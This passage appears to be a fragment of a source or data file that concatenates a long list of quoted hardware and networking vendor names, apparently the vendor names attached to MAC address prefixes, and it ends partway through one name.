"Tonal", + "BLT Co", + "JETTER CO., Ltd.", + "ADF Technologies Sdn Bhd", + "Centripetal Networks, Inc", + "IPricot formerly DotCom", + "Nikkiso Co., Ltd.", + "2xWireless", + "Guangdong Enok Communication Co., Ltd", + "Smallbig Technology", + "Reduxio Systems", + "Abelko Innovation", + "Topwell International Holdinds Limited", + "Olive & Dove Co.,Ltd.", + "Comau S.p.A", + "Beijing Splendidtel Communication Technology Co,. Ltd", + "Universal Tiancheng Technology (Beijing) Co., Ltd.", + "Ruio telecommunication technologies Co., Limited", + "Optical Access International", + "Shenzhen Duubee Intelligent Technologies Co.,LTD.", + "Unit-Em", + "Beijing Winicssec Technologies Co., Ltd.", + "Avonic", + "Trackflow Ltd.", + "Haier Group Technologies Ltd", + "Enice Network.", + "Dressler Gmbh & Co.", + "VTC Telecommunications", + "Shenzhen Crave Communication Co., LTD", + "COMESTA, Inc.", + "Championtech Enterprise (Shenzhen) Inc", + "Shenzhen MTN Electronics CO., Ltd", + "Oetiker Schweiz AG", + "Smartisan Digital Co., Ltd", + "Nextwill", + "Eline Technology co.Ltd", + "Shenzhen MeiG Smart Technology Co.,Ltd", + "DEV Tecnologia Ind Com Man Eq LTDA", + "Curiouser Products Inc", + "Energica Motor Company SpA", + "Nain Inc.", + "Eastcompeace Technology Co., Ltd", + "Lampex Electronics Limited", + "Shenyang wisdom Foundation Technology Development Co., Ltd.", + "Cerebras Systems Inc", + "Icomm Hk Limited", + "Viasat Group S.p.A.", + "Disruptive Technologies Research AS", + "o2ones Co., Ltd.", + "Netaccess, Inc.", + "Eoptolink Technology Inc. Ltd,", + "Zeppelin Systems GmbH", + "Grasphere Japan", + "Apollo Seiko Ltd.", + "Network Devices Pty Ltd", + "Guizhou Huaxintong Semiconductor Technology Co Ltd", + "Dongguan Solum Electronics Co.,Ltd", + "Sehaj Synergy Technologies Private Limited", + "Midicom Electronics Co.ltd", + "Vodafone UK", + "SIEMENS AG, Digital Factory, Motion Control System", + "Tilgin AB", + "Third Millennium Systems Ltd.", + "Beijing TongTongYiLian Science and Technology Ltd.", + "HAKKO Corporation", + "Automation Electronics", + "Shenzhen Wintop Photoelectric Technology Co., Ltd", + "Equustek Solutions, Inc.", + "Easy Soft TV Co., Ltd", + "Ethertronics Inc", + "Green Information System", + "Electronic Systems Protection, Inc.", + "Shenzhen Xinyupeng Electronic Technology Co., Ltd", + "Magellan Technology Pty Limited", + "WiChorus, Inc.", + "Hitachi Johnson Controls Air", + "Braveridge.co.,ltd.", + "Shenzhen City LinwlanTechnology Co. Ltd.", + "Shenzhen TONG BO WEI Technology CO.,LTD", + "Pado Systems, Inc.", + "Verizon", + "H+S Polatis Ltd", + "Asia Vital Components Co.,Ltd.", + "C-Kur TV Inc.", + "E-M Technology, Inc.", + "High Grade Controls Corporation", + "SM Optics S.r.l.", + "Somfy-Protect By Myfox SAS", + "Shenzhen Xunlong Software Co.,Limited", + "Xiamen Hanin Electronic Technology Co., Ltd", + "Nj System Co.,Ltd", + "Emplus Technologies", + "Thales Alenia Space", + "Blu Wireless Technology Ltd", + "Fca", + "Opticon Sensors Europe B.V.", + "Secure Meters Limited", + "jinyoung", + "Panasonic Industrial Devices Europe GmbH", + "Beijing FaceCam Technology Co., Ltd.", + "Ningbo Dooya Mechanic & Electronic Technology Co., Ltd", + "MobileAria", + "Panasonic Europe Ltd.", + "TrackNet, Inc", + "PT. Hartono Istana Teknologi", + "Cloudleaf, Inc.", + "Ningbo Freewings Technologies Co.,Ltd", + "Energotest", + "SynTrust Tech International Ltd.", + "mixi,Inc.", + "Qingdao Topscomm Communication Co., Ltd", + "Shenzhen Ogemray Technology Co.,Ltd", + "Kandao lightforge Co., Ltd.", + "Nest Labs Inc.", + "ADC Corporation", + "WAAV, Inc.", + "Tyan Computer Corp", + "Quest Software, Inc.", + "Adero Inc", + "nyantec GmbH", + "Zyptonite", + "LifeBEAM Technologies LTD", + "Vnpt Technology", + "Guangdong Global Electronic Technology CO.,LTD", + "e-CON SYSTEMS INDIA PVT LTD", + "Sandstone Technologies", + "Beijing Chushang Science and Technology Co.,Ltd", + "ShenZhen IDWELL Technology CO.,Ltd", + "NTT Innovation Institute, Inc.", + "nextLAP GmbH", + "Provision Thai Co., Ltd.", + "Techmation Co.,Ltd.", + "ManTechnology Inc.", + "Kbvision Group", + "LiteON", + "Axilspot Communication", + "Shadow Creator Information Technology Co.,Ltd.", + "AM Telecom co., Ltd.", + "Premietech Limited", + "3ALogics", + "Tanaka S/S Ltd.", + "Shenzhen YITOA Digital Appliance CO.,LTD", + "Guangzhou Chip Technologies Co.,Ltd", + "MRV Comunications", + "RNware Co.,Ltd.", + "Knowledge Development for POF S.L.", + "Wifi-soft LLC", + "Bionime", + "Cadi Scientific Pte Ltd", + "Bhp Limited", + "ADB Italia", + "Eden Sistemas De Computacao Sa", + "Sovico", + "ShotTracker", + "DS Global. Co., LTD", + "O-Net Communications (Shenzhen) Limited", + "Digital Services, Ltd.", + "SabiOso", + "shenzhen sibituo Technology Co., Ltd", + "Beijing Unisound Information Technology Co.,Ltd.", + "Zhongtian broadband technology co., LTD", + "Soraa, Inc.", + "bebro electronic GmbH", + "Select Comfort", + "PHYTRONIX Co.,Ltd.", + "Wapice Ltd.", + "Delta Faucet Company", + "Dongguan Haimai Electronie Technology Co.,Ltd", + "Hunan Comtom Electronic Incorporated Co.,Ltd", + "Leeman International (HongKong) Limited", + "PlayFusion Limited", + "Zenner", + "Shenzhen Trylong Smart Science and Technology Co., Ltd.", + "Leader Phone Communication Technology Co., Ltd.", + "Xi'an NovaStar Tech Co., Ltd", + "Echodyne Corp", + "Gafachi, Inc.", + "Nuheara Ltd", + "Shenzhen Wei Da Intelligent Technology Go.,Ltd", + "Jiangsu Toppower Automotive Electronics Co., Ltd", + "chaowifi.com", + "SS Telecoms", + "Wavelab Global Inc.", + "Kinestral Technologies, Inc.", + "SF Technology Co.,Ltd", + "2Crsi", + "waytotec,Inc.", + "Mpgio Co.,Ltd", + "Beijing Orient View Technology Co., Ltd.", + "NetChip Technology, Inc.", + "7signal Solutions, Inc", + "Maxio", + "Z-Tec", + "Dewav (Hk) Electronics Limited", + "Shenzhen Chima Technologies Co Limited", + "SHENZHEN IP-COM Network Co.,Ltd", + "LifeHealth, LLC", + "Lemobile Information Technology (Beijing) Co., Ltd.", + "Adler ELREHA GmbH", + "Seojun Electric", + "ShenZhen Ultra Easy Technology CO.,LTD", + "Velux", + "Exo S.a.", + "Ezelink Telecom", + "JazzMutant", + "Pika Technologies Inc.", + "DDRdrive LLC", + "Panasonic Automotive Systems Company of America", + "Arada Systems, Inc.", + "DesignArt Networks", + "Mag Tech Electronics Co Limited", + "ATRON electronic GmbH", + "MaxMedia Technology Limited", + "Compass Technologies Inc.", + "Mpmkvvcl", + "Wayfarer Transit Systems Ltd", + "MONAD., Inc.", + "Wenzhou Kunmei Communication Technology Co.,Ltd.", + "Frontier Silicon Ltd", + "Conextop", + "Turbostor", + "Ultra Electronics Electrics", + "MICRODIA Ltd.", + "21168", + "CABLELOGIC Co., Ltd.", + "Kwangsung Electronics Korea Co.,Ltd.", + "Datrium, Inc.", + "RLW Inc.", + "XStreamHD", + "Cloud Corner Ltd.", + "P&S Technology", + "ShenZhen QianHai Comlan communication Co.,LTD", + "The IMS Company", + "Shandong Bittel Electronics Co., Ltd", + "OWIN Inc.", + "Shenzhen FH-NET OPTOELECTRONICS CO.,LTD", + "Addénergie Technologies", + "8Bitdo Technology Hk Limited", + "PLC Technology Ltd", + "Qpsx Communications, Ltd.", + "VMware, Inc.", + "Oi Electric Co.,Ltd", + "SMC Corporation", + "Zenith Electronics Corporation", + "Ciesse", + "Shenzhen Neostra Technology Co.Ltd", + "Leedarson Lighting Co., Ltd.", + "Hon Hai-Ccpbg Precision Ind.co.,Ltd.", + "Jiangsu Huaxing Electronics Co., Ltd.", + "ON Semiconductor", + "Hanson Research Corporation", + "Whitesky Science & Technology Co.,Ltd.", + "Shenzhen Yunlink Technology Co., Ltd", + "Shenzhen Nuoshi Technology Co., LTD.", + "Smartron India Pvt ltd", + "Hao Cheng Group Limited", + "AUMA Riester GmbH & Co. KG", + "Ningbo Sanhe Digital Co.,Ltd", + "Euronda SpA", + "HARTING Electronics GmbH", + "Cubro Acronet GesmbH", + "Turbulence Design Inc.", + "LSD Science and Technology Co.,Ltd.", + "MI-Zone Technology Ireland", + "Sicon srl", + "Maksat Technologies (P) Ltd", + "Broad Telecom SA", + "TATUNG Technology Inc.", + "scemtec Transponder Technology GmbH", + "Jabil Circuit (Shanghai) Ltd.", + "Intek Digital", + "Integrated Device", + "Input/Output, Inc.", + "Ingenico", + "Global Village Communication", + "Drivenets", + "Hdpro Co., Ltd.", + "EDSLAB Technologies", + "IDS, Inc", + "Ledvance", + "Zadara Storage Ltd.", + "Softcom A/S", + "Digital Media Cartridge Ltd.", + "Wi-SUN Alliance", + "Anhui Huami Information Technology Company Limited", + "Yamaha Motor Co.,Ltd", + "Shenzhen Lemon Network Technology Co.,Ltd", + "Green Motive Technology Limited", + "Nikon Corporation", + "Ison Technology Co., Ltd.", + "Skytap", + "Clariion", + "Mai Logic Inc.", + "IMAX Corporation", + "Zhongshan B&T technology.co.,ltd", + "Soft Imaging System GmbH", + "Chyi Lee industry Co., ltd.", + "Current, powered by GE", + "Formation Data Systems", + "Honeywell Environmental & Combustion Controls (Tianjin) Co., Ltd.", + "Tactical Communications", + "Wintecronics Ltd.", + "Datavan Tc", + "Beijing ASU Tech Co.,Ltd", + "Casio Hitachi Mobile Communications Co., Ltd.", + "Asmax Solutions", + "Brivo Systems, LLC", + "OB Telecom Electronic Technology Co., Ltd", + "Infinique Worldwide Inc", + "Beijing RongZhi xinghua technology co., LTD", + "Leadcore Technology CO.,LTD", + "DeLaval International AB", + "Nipro Diagnostics, Inc", + "Swelaser AB", + "COL GIOVANNI PAOLO SpA", + "Somo Holdings & Tech. Co.,Ltd.", + "Bittium Wireless Ltd", + "Flexoptix GmbH", + "NO NDA Inc", + "ServerNet S.r.l.", + "Kpn. B.v.", + "Intel Wireless Network Group", + "Juniper Systems", + "Standar Telecom", + "Shenzhen Tencent Computer System Co., Ltd.", + "Nera Telecommunications Ltd.", + "Qinghai Kimascend Electronics Technology Co. Ltd.", + "Shenzhen Kang Ying Technology Co.Ltd.", + "Fullpower Technologies, Inc.", + "ORA Inc.", + "miControl GmbH", + "Shanghai Airm2m Communication Technology Co., Ltd", + "August Home, Inc.", + "Wuxi Zhanrui Electronic Technology Co.,LTD", + "Trace Live Network", + "Tempo Australia Pty Ltd", + "Pax AB", + "Genevisio Ltd.", + "G24 Power Limited", + "JinQianMao Technology Co.,Ltd.", + "Beijing Spirit Technology Development Co., Ltd.", + "Viptela, Inc", + "Beijing HuaqinWorld Technology Co.,Ltd.", + "Husqvarna AB", + "Beijing Heweinet Technology Co.,Ltd.", + "Shanghai Simcom Limited", + "E3 Enterprise", + "Shenzhen 3Nod Digital Technology Co., Ltd.", + "Valve Corporation", + "Mesmo Technology Inc.", + "MICRODIGTAL Inc", + "ITTIM Technologies", + "King Slide Technology CO., LTD.", + "Shenzhen First Blue Chip Technology Ltd", + "ZTLX Network Technology Co.,Ltd", + "HangZhou KuoHeng Technology Co.,ltd", + "Shenzhen Aisat Electronic Co., Ltd.", + "Mciao Technologies, Inc.", + "Jiangsu SEUIC Technology Co.,Ltd", + "Shenzhen Atsmart Technology Co.,Ltd.", + "Beijing SHENQI Technology Co., Ltd.", + "Eco Plugs Enterprise Co., Ltd", + "Tonfunk Systementwicklung und Service GmbH", + "Chengdu XGimi Technology Co.,Ltd", + "SST Taiwan Ltd.", + "Acacia Communications", + "ABB Xiamen Low Voltage Equipment Co.,Ltd.", + "Supercomputing Systems AG", + "LG Chem", + "ITX security", + "Mercedes-Benz USA, LLC", + "Philips Oral Healthcare, Inc.", + "IgniteNet", + "Aperi Corporation", + "Maquet GmbH", + "Dongguan Aoyuan Electronics Technology Co., Ltd", + "Posh Mobile Limited", + "Sonance", + "Hefei Bitland Information Technology Co.Ltd", + "Saijo Denki International Co., Ltd.", + "BinCube", + "Argox Information Co., Ltd.", + "Guangzhou YBDS IT Co.,Ltd", + "Sonavation, Inc.", + "Ivenix, Inc.", + "Nexpring Co. LTD.,", + "Shenzhen ATUE Technology Co., Ltd", + "Shenzhen Sowell Technology Co., LTD", + "PT Inovação e Sistemas SA", + "Daeho I&T", + "Shenzhen Hikeen Technology CO.,LTD", + "Gpi Korea Inc.", + "Challenger Supply Holdings, LLC", + "Vachen Co.,Ltd", + "Health & Life co., Ltd.", + "Ximea", + "Nero AG", + "Shenzhen LiWiFi Technology Co., Ltd", + "b-plus GmbH", + "AthenTek Inc.", + "Beward R&D Co., Ltd.", + "ShangHai sunup lighting CO.,LTD", + "Tellabs Inc.", + "Founder Broadband Network Service Co.,Ltd", + "NovaSparks", + "Dynalec Corporation", + "ClearSky Data", + "ISis ImageStream Internet Solutions, Inc", + "Koubachi AG", + "Wyconn", + "Posbank Co.,Ltd", + "Techvision Intelligent Technology Limited", + "Ketra, Inc.", + "Shenzhen Kaixuan Visual Technology Co.,Limited", + "3bumen.com", + "Industrias Unidas Sa De Cv", + "Veo-Labs", + "Shen Zhen Heng Sheng Hui Digital Technology Co.,Ltd", + "Camco Technologies NV", + "CETORY.TV Company Limited", + "Nanjing Iot Sensor Technology Co,Ltd", + "SPRINGWAVE Co., Ltd", + "Longconn Electornics(shenzhen)Co.,Ltd", + "Maike Industry(Shenzhen)CO.,LTD", + "Rigado, LLC", + "Noon Technology Co., Ltd", + "iSun Smasher Communications Private Limited", + "Orange Polska", + "Along Industrial Co., Limited", + "Yeelink", + "RAONIX Inc.", + "testo Instruments (Shenzhen) Co., Ltd.", + "Zoovel Technologies", + "LinkedHope Intelligent Technologies Co., Ltd", + "scemtec Hard- und Software fuer Mess- und Steuerungstechnik GmbH", + "Qihoo 360 Technology Co.,Ltd", + "ABB Power Systems Power Generation", + "TAKT Corporation", + "Shanghai Jing Ren Electronic Technology Co., Ltd.", + "Suzhou HOTEK Video Technology Co. Ltd", + "Anhui Wanzten P&T Co., Ltd", + "Bme Corporation", + "Mexus Co.,Ltd", + "Unitend Technologies Inc.", + "CONWIN.Tech. Ltd", + "Foxtel Management Pty Ltd", + "Thinking Technology Co.,Ltd", + "iKey, Ltd.", + "Fanvil Technology Co., Ltd.", + "Abloomy", + "Bluecom", + "Woojin Industrial Systems Co., Ltd.", + "Ebay Inc", + "Aitexin Technology Co., Ltd", + "Circle Reliance, Inc DBA Cranberry Networks", + "FOCUS H&S Co., Ltd.", + "Comnect Technology CO.,LTD", + "HiteVision Digital Media Technology Co.,Ltd.", + "myIDkey", + "Siemens Low Voltage & Products", + "HPL Electric & Power Private Limited", + "Utek Technology (Shenzhen) Co.,Ltd", + "Spreadtrum Communications (Shanghai) Co., Ltd.", + "Jid Global", + "Imagik Int'l Corp", + "Hunan Fenghui Yinjia Science And Technology Co.,Ltd", + "Uniband Electronic Corp,", + "Nanjing Signway Technology Co., Ltd", + "ValueHD Corporation", + "Shenzhen Communication Technologies Co.,Ltd", + "Winterhalter Gastronom GmbH", + "Beijing Shidai Hongyuan Network Communication Co.,Ltd", + "FORICS Electronic Technology Co., Ltd.", + "ForgetBox", + "Max-Tech,Inc", + "WSH GmbH", + "Shenzhen Riopine Electronics Co., Ltd", + "PowerComm Solutions LLC", + "Institute of microelectronic applications", + "Glory Horse Industries Ltd.", + "ASA-RT s.r.l.", + "Aifa Technology Corp.", + "DongGuang EnMai Electronic Product Co.Ltd.", + "Shenzhen Rui Ying Da Technology Co., Ltd", + "Phoenix Geophysics Ltd.", + "Devline Limited", + "8Locations Co., Ltd.", + "automationNEXT GmbH", + "Bloombase, Inc.", + "Hangzhou Anheng Info&Tech CO.,LTD", + "E-Lead Electronic Co., Ltd", + "R&M AG", + "Klemsan Elektrik Elektronik San.ve Tic.as.", + "TRONTEQ Electronic", + "Kwangwon Tech Co., Ltd.", + "VS Vision Systems GmbH", + "Shenzhen Linkworld Technology Co,.LTD", + "Shiningtek", + "Addrek Smart Solutions", + "Shanghai Lynuc Cnc Technology Co.,Ltd", + "Midori Electronic Co., Ltd.", + "Graphite Systems", + "Moog Protokraft", + "Computer Performance, Inc. DBA Digital Loggers, Inc.", + "Helmer Scientific", + "Tariox Limited", + "Syscor Controls & Automation", + "Servergy, Inc.", + "Shenzhen Mdk Digital Technology Co.,Ltd", + "OTEC(Shanghai)Technology Co.,Ltd.", + "MS-Magnet", + "TLS Corporation", + "Entropix, LLC", + "Filmetrics Inc.", + "SDJ Technologies, Inc.", + "mywerk Portal GmbH", + "Changzhou Yongse Infotech Co.,Ltd", + "Wavetronix", + "Shenzhen Shidean Legrand Electronic Products Co.,Ltd", + "Recovision Technology Co., Ltd.", + "SHENZHEN TW-SCIE Co., Ltd", + "Gmj Electric Limited", + "Shanghai Yali Electron Co.,LTD", + "Snb Technologies Limited", + "Core Brands, LLC", + "Ever Treasure Industrial Limited", + "ACTEON Group", + "Gentrice tech", + "Entertainment Solutions, S.L.", + "Telecon Galicia,S.a.", + "Shanghai annijie Information technology Co.,LTD", + "Contour Design LLC", + "ThinGlobal LLC", + "YF Technology Co., Ltd", + "Jenny Science AG", + "Openmatics s.r.o.", + "Kodofon JSC", + "Mediplan Limited", + "Y-cam Solutions Ltd", + "Stable Imaging Solutions LLC", + "YACOUB Automation GmbH", + "Pishion International Co. Ltd", + "Wuhan Changjiang Electro-Communication Equipment CO.,LTD", + "Dawning Information Industry Co.,Ltd", + "Medallion Instrumentation Systems", + "Atlas Copco IAS GmbH", + "Siemens Healthcare Diagnostics, Inc", + "Shenzhen Strong Rising Electronics Co.,Ltd DongGuan Subsidiary", + "Cloud Vision Networks Technology Co.,Ltd.", + "Mobilicom LTD", + "Hns", + "Surveillance Pro Corporation", + "Codetek Technology Co.,Ltd", + "Gpms", + "Next Level Security Systems, Inc.", + "Euclid Laboratories, Inc.", + "Qardio, Inc", + "Beijing Hesun Technologies Co.Ltd.", + "XTA Electronics Ltd", + "CODACO ELECTRONIC s.r.o.", + "TECHNART Co.,Ltd", + "Viableware, Inc", + "DOLI Elektronik GmbH", + "Performance Designed Products, Llc", + "Polewall Norge AS", + "Beijing Zhongdun Security Technology Development Co.", + "Eagle World Development Co., Limited", + "Chengdu Xuguang Technology Co, Ltd", + "Tescom Co., Ltd.", + "ELVEES NeoTek OJSC", + "Jiangsu Zhongxun Electronic Technology Co., Ltd", + "Merchandising Technologies, Inc", + "Terewave. Inc.", + "V-Zug Ag", + "abatec group AG", + "Chengdu jinshi communication Co., LTD", + "Systembase Limited", + "Yamato Scale Co.,Ltd.", + "Wing Sing Electronics Hong Kong Limited", + "IDT Technology Limited", + "Chofu Seisakusho Co.,Ltd", + "Chabrier Services", + "IAI Corporation", + "DHC Software Co.,Ltd", + "Sitronik", + "Revogi Innovation Co., Ltd.", + "ShenZhen ACTO Digital Video Technology Co.,Ltd.", + "CSG Science & Technology Co.,Ltd.Hefei", + "Micro-Biz intelligence solutions Co.,Ltd", + "Specto Paineis Eletronicos Ltda", + "BoxCast", + "Satmap Systems Ltd", + "Nanjing Shining Electric Automation Co., Ltd", + "Applied Vision Corporation", + "PT. Prasimax Inovasi Teknologi", + "T:mi Ytti", + "Anhui comhigher tech co.,ltd", + "Arcontia International AB", + "Ampt, LLC", + "SnapAV", + "Revolv Inc", + "MindMade Sp. z o.o.", + "Team Engineers Advance Technologies India Pvt Ltd", + "Virident Systems, Inc.", + "Open Networking Laboratory", + "ENVINET GmbH", + "ImTech Technologies LLC,", + "Fresenius Medical Care Deutschland GmbH", + "CommSky Technologies", + "isepos GmbH", + "Southwest Microwave, Inc", + "Advantage Controls", + "QiiQ Communications Inc.", + "Lightware Visual Engineering", + "Rechnerbetriebsgruppe", + "SZ Telstar CO., LTD", + "Sulzer Pump Solutions Finland Oy", + "Turkcell Teknoloji", + "Shenzhen Vsun communication technology Co.,ltd", + "Open Source Robotics Foundation, Inc.", + "Anakreon UK LLP", + "Calxeda, Inc.", + "Matsunichi Digital Technology (Hong Kong) Limited", + "Vadaro Pte Ltd", + "Manycolors, Inc.", + "Shenzhen Basicom Electronic Co.,Ltd.", + "KERNEL-I Co.,LTD", + "Shanghai iComhome Co.,Ltd.", + "China Palms Telecom.Ltd", + "Beijing Signalway Technologies Co.,Ltd", + "Indu-Sol GmbH", + "ISB Corporation", + "zhejiang ebang communication co.,ltd", + "Zhehua technology limited", + "Ereca", + "Beijing General Research Institute of Mining and Metallurgy", + "Daikyung Vascom", + "Clover Network, Inc.", + "Jantar d.o.o.", + "Y Soft Corporation, a.s.", + "Serelec", + "Aboundi, Inc.", + "Airo Wireless", + "Shanghai Reallytek Information Technology Co.,Ltd", + "PENTA Gesellschaft für elektronische Industriedatenverarbeitung mbH", + "Wally", + "Eclipse Electronic Systems Inc.", + "Zenovia Electronics Inc.", + "LenovoEMC Products USA, LLC", + "Cloudview Limited", + "Babolat VS", + "Autotalks Ltd.", + "Logic3 plc", + "Shenzhen SHX Technology Co., Ltd", + "KSH International Co., Ltd.", + "Stuart Manufacturing, Inc.", + "Musilab Electronics (DongGuan)Co.,Ltd.", + "GP Electronics (HK) Ltd.", + "Proteus Digital Health", + "Shenzhen TATFOOK Technology Co., Ltd.", + "Scientech Electronics", + "Innovative Computer Engineering", + "FeiTian United (Beijing) System Technology Co., Ltd.", + "GreenBytes, Inc.", + "Guangzhou Sunrise Electronics Development Co., Ltd", + "Onnet Technologies and Innovations LLC", + "Ubiquitous Communication Co. ltd.", + "MVTECH co., Ltd", + "Japan System Design", + "iS5 Communications Inc.", + "OmniLync Inc.", + "Society of Motion Picture & Television Engineers", + "GN ReSound A/S", + "Beijing Yupont Electric Power Technology Co.,Ltd", + "Shen Zhen Shi Xin Zhong Xin Technology Co.,Ltd.", + "Lika srl", + "Masterwork Automodules", + "Flow Data Inc", + "Aker Subsea Ltd", + "One", + "Primmcon Industries Inc", + "Guangzhou Zonerich Business Machine Co., LTD.", + "Velex s.r.l.", + "Goden Tech Limited", + "Towerstream Corpration", + "Shenzhen Sinkna Electronics Co., LTD", + "DarbeeVision Inc.", + "WI-BIZ srl", + "HDMI Forum", + "Rrcn Sas", + "QinetiQ North America", + "Novakon Co., Ltd.", + "Robert Bosch Healthcare GmbH", + "AG Elektronik AB", + "Embertec Pty Ltd", + "The Now Factory", + "Macandc", + "E-Band Communications Corp.", + "Motion Analysis Corporation", + "Nationz Technologies Inc", + "Atamo Pty Ltd", + "Plugable Technologies", + "Wuxi YSTen Technology Co.,Ltd.", + "Beijing Banner Electric Co.,Ltd", + "Generalplus Technology Inc.", + "Robert Bosch LLC Automotive Electronics", + "Emergent Vision Technologies Inc.", + "Toshiba Global Commerce Solutions", + "Centera Photonics Inc.", + "A. Eberle GmbH & Co. KG", + "Amatis Controls", + "Fairfield Industries", + "Amicus SK, s.r.o.", + "Applied Micro Electronics AME bv", + "Wisol", + "Xetawave LLC", + "ALTOGRAPHICS Inc.", + "Nagtech Llc", + "cozybit, Inc.", + "T3 Innovation", + "Kessler Crane Inc.", + "Pjrc.com, Llc", + "Hyunteck", + "Lite-On Technogy Corp.", + "Axview Technology (Shenzhen) Co.,Ltd", + "Curtis Instruments, Inc.", + "Berthold Technologies GmbH and Co.KG", + "Wartsila Finland Oy", + "Siemens Mobility Limited", + "Hellberg Safety AB", + "KZ Broadband Technologies, Ltd.", + "Tsl Ppl", + "Move Innovation", + "PowerCloud Systems, Inc.", + "Veethree Electronics And Marine LLC", + "CableWorld Ltd.", + "Promate Electronic Co.ltd", + "Getriebebau NORD GmbH and Co. KG", + "Verifi, LLC", + "Tensun Information Technology(Hangzhou) Co.,LTD", + "OSASI Technos Inc.", + "DEP Company", + "CountMax, ltd", + "Norfolk Elektronik AG", + "Usag", + "Carry Technology Co.,Ltd", + "fos4X GmbH", + "Tagatec Co.,Ltd", + "Villiger Security Solutions AG", + "bytes at work AG", + "Imaging Diagnostics", + "Cypress Technology CO., LTD.", + "Chengdu Yingji Electronic Hi-tech Co Ltd", + "ChangYang Technology (Nanjing) Co., LTD", + "Quintic Corp.", + "Ramaxel Technology (Shenzhen) limited company", + "Shenzhen Megmeet Electrical Co.,Ltd", + "RF IDeas", + "Throughtek Co., Ltd.", + "Danfoss Turbocor Compressors, Inc", + "FUJITU(HONG KONG) ELECTRONIC Co.,LTD.", + "MEDIAEDGE Corporation", + "Eito Electronics Co., Ltd.", + "Bekey A/S", + "Modelleisenbahn GmbH", + "SeekTech INC", + "Mitsuya Laboratories Inc.", + "Suntaili Enterprise Co. Ltd,", + "Kone OYj", + "i Wit Digital Co., Limited", + "ADL Embedded Solutions, Inc.", + "Asahi Electronics Co.,Ltd", + "wi-daq, inc.", + "Mesa Labs", + "Taimag Corporation", + "Securifi Ltd", + "Germaneers GmbH", + "Radio Mobile Access", + "Panoptic Technology, Inc", + "Shina System Co., Ltd", + "Hi-flying electronics technology Co.,Ltd", + "TE Connectivity Touch Solutions", + "Shenzhen Huaxun Ark Technologies Co.,Ltd", + "Shanghai TYD Elecronic Technology Co. Ltd", + "Mission Technology Group, dba Magma", + "Pluribus Networks, Inc.", + "Digience Co.,Ltd.", + "C&T Solution Inc.", + "LARsys-Automation GmbH", + "Marshal Corporation", + "EKM Metering", + "Uniqoteq Ltd.", + "I Smart Cities HK Ltd", + "Shenzhen Runsil Technology Co.,Ltd", + "Cypress Electronics Limited", + "Deciso B.V.", + "Global Digitech Co LTD", + "Connected Data, Inc.", + "Data Management, Inc.", + "AzureWave Technologies (Shanghai) Inc.", + "DSSD Inc", + "Omnima Limited", + "Zmodo Technology Corporation", + "ETH Inc.", + "Seungil Electronics", + "NextNav, LLC", + "Hangzhou Zhiway Technologies Co.,Ltd.", + "Veedims,Llc", + "Abilis Systems SARL", + "Honeywell Analytics", + "OptiSense Network, LLC", + "MyCloud Technology corporation", + "Apr, Llc", + "Phillips Machine & Welding Co., Inc.", + "Compex Systems Pte Ltd", + "Anywire corporation", + "Bear Flag Design, Inc.", + "Beijing Gehua Catv Network Co.,Ltd", + "URadio Systems Co., Ltd", + "Keopsys", + "Syncbak, Inc.", + "VAHLE Automation GmbH", + "Hanson Technology", + "Shenzhen Siviton Technology Co.,Ltd", + "MobilMAX Technology Inc.", + "Nabto", + "Aditya Infotech Ltd.", + "Triple Domain Vision Co.,Ltd.", + "Asiatelco Technologies Co.", + "Janz - Contadores de Energia, SA", + "Shenzhen Heguang Measurement & Control Technology Co.,Ltd", + "Xirrus Inc.", + "Synapse Product Development", + "Grand Products Nevada, Inc.", + "VIPAR GmbH", + "PAD Peripheral Advanced Design Inc.", + "Gospell DIGITAL TECHNOLOGY CO., LTD", + "PRIMA Cinema, Inc", + "UNO System Co., Ltd", + "CHG Hospital Beds", + "Digital Control Incorporated", + "CG Mobile", + "Niigata Power Systems Co., Ltd.", + "PixeLINK", + "Greenlee", + "Accupix Inc.", + "Chongqing MAS SCI&TECH.Co.,Ltd", + "Zhejiang ROICX Microelectronics", + "Maquet CardioVascular", + "Corintech Ltd.", + "Taztag", + "marco Systemanalyse und Entwicklung GmbH", + "Casacom Solutions AG", + "MakerBot Industries", + "Talon Communications", + "TTTech Computertechnik AG", + "Netatmo", + "Iea S.r.l.", + "ZuniData Systems Inc.", + "NSFOCUS Information Technology Co., Ltd.", + "TLab West Systems AB", + "CDYNE Corporation", + "IEEE P1823 Standards Working Group", + "Happyelectronics Co.,Ltd", + "Dedicated Computing", + "OceanServer Technology, Inc", + "Shenzhen Kingtech Communication Equipment Co.,Ltd", + "Guangzhou Horizontal Information & Network Integration Co. Ltd", + "Tigaro Wireless", + "vastriver Technology Co., Ltd", + "PowerRay Co., Ltd.", + "Kiio Inc", + "Shenzhen Bul-Tech Co.,Ltd.", + "WayTools, LLC", + "Nesys", + "Shenzhen Loadcom Technology Co.,Ltd", + "Toshiba Samsung Storage Technolgoy Korea Corporation", + "XySystem", + "SmartOptics AS", + "ABB Genway Xiamen Electrical Equipment CO., LTD", + "Sistemas de Gestión Energética S.A. de C.V", + "Dipl.-Ing. H. Horstmann GmbH", + "KongTop industrial(shen zhen)CO.,LTD", + "Altierre", + "Scale Computing, Inc.", + "Justec International Technology INC.", + "QuantHouse", + "Mohlenhoff GmbH", + "Preceno Technology Pte.Ltd.", + "Enatel LTD", + "Reach Technology Inc.", + "µTech Tecnologia LTDA", + "Teb Sas", + "Letta Teknoloji", + "IPitomy Communications", + "Chongqing Sichuan Instrument Microcircuit Co.LTD.", + "Hitachi High-Technologies Corporation", + "Digimore Electronics Co., Ltd", + "Hisense Broadband Multimedia Technology Co.,Ltd.", + "Oriental Pacific International Limited", + "Gatekeeper Systems, Inc.", + "Powerhouse Dynamics", + "Neul Ltd", + "Siconix Inc.", + "Wi3 Inc.", + "NexGen Storage", + "Rice Lake Weighing Systems", + "Maxeler Technologies Ltd.", + "JSC SDO Chromatec", + "FAG Industrial Services GmbH", + "Symeo GmbH", + "Yottabyte", + "Kulite Semiconductor Products Inc", + "Bio Sound Lab Co., Ltd.", + "EoCell", + "Observator instruments", + "Beijing Lanbo Technology Co., Ltd.", + "smart-electronic GmbH", + "Nimbus Inc.", + "MODI GmbH", + "Austco Marketing & Service (USA) ltd.", + "Rusteletech Ltd.", + "eSSys Co.,Ltd", + "d-broad,INC", + "DONGGUAN ipt INDUSTRIAL CO., LTD", + "En-Vision America, Inc.", + "Multimedia Pacific Limited", + "OMICRON electronics GmbH", + "NovaTec Kommunikationstechnik GmbH", + "Sky Light Digital Limited", + "ShenZhen RicherLink Technologies Co.,LTD", + "Actions Semiconductor Co.,Ltd.(Cayman Islands)", + "Opzoon Technology Co.,Ltd.", + "FuJian Elite Power Tech 